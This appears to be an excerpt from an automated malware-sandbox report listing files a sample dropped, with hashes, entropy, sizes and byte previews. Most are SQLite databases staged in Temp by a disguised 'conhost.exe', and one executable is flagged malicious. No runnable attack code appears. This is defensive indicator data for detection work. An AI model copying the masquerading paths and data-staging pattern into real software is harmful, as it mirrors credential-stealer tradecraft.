
                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\explorer.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Zn0uX5K1ez.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5736960
                                                          Entropy (8bit):7.910565025661082
                                                          Encrypted:false
                                                          SSDEEP:98304:SJuJhPWclzxum6p/GuTIZULvC6LcbE6HGek94x1RK22cJfcdnidC7GpWhGrj6j:QuaAxSTZLvD6/x1R92cJUMo7xS6
                                                          MD5:52AAA8C3FD6B813B713AE05AB9E4829C
                                                          SHA1:D4AC8ADDBE5E15E867AFE58F4BBB8319395AD38E
                                                          SHA-256:0C30D4CB510304D4CE140952F8CE316056CC4BC552CEF78A81FD5301AECC1FD2
                                                          SHA-512:C39BBA95A8554F1115D0362BAD33901FD87E00D5DE7671CD48D7B537C97889882B9009A83948087CF8516A32588E4EF831531977740B17A2791CEC927934FDD8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 65%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..../.e..........#....".n...R........5........@.......................................... ..........................................>6.O.....t.,...............-.....................................................@............p4..............................text...[m.......................... ..`.rdata...<..........................@..@.data...............................@....pdata..............................@..@.'|?......3......................... ..`.h>&.........p4.....................@....SnO.....vW...4..xW.................`..h.rsrc.................W.............@..@................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\f0ojr9cU5L

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\fKyZvnP0UO

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\fkffivkAfN

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\g0LcWYZoL5

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\g0l7jtJsdI

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\gCsv4sRiLc

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\gDiYCnYxyI

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\gJDwQ5XnXs

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\gMtBEv7h5P

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\gQ6v8ORoA0

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\gus8gVV6Z1

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\gxZeSFkrNg

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\hDwgTH0tbd

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.213660689688185
                                                          Encrypted:false
                                                          SSDEEP:3:nO7ApZe/gn:Q2Ze/g
                                                          MD5:26A246F1A84FDE863F9A12A6BF20C060
                                                          SHA1:03C48121ED6187D042D84FFC5D1E9DD8B3113C19
                                                          SHA-256:53C78D65CA6C8A173A302ADC42A806545212592F2AE6EB9E766D253EA108BEEC
                                                          SHA-512:C1C1888DAEC091478C4E56683C4AB1DFA96DBEC7EFEC30739FB0CF6F291B2C1E6F680A14693DD01EB7C59CB06B097FA987C19F4485C154BF6E6BAF9D483116C8
                                                          Malicious:false
                                                          Preview:7f6ujSujUc2uY2LbVnhiUMAmE

                                                          C:\Users\user\AppData\Local\Temp\hmy311ZT3s

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\iErH2toz9w

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\jHZzNC0WzG

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\jS9YrnT28m

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\jhDwJJ7iHa

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\jnvGp6Bhas

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\kFlkgvqUCX

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\kLpULUaATZ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\kc1V1W839y

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
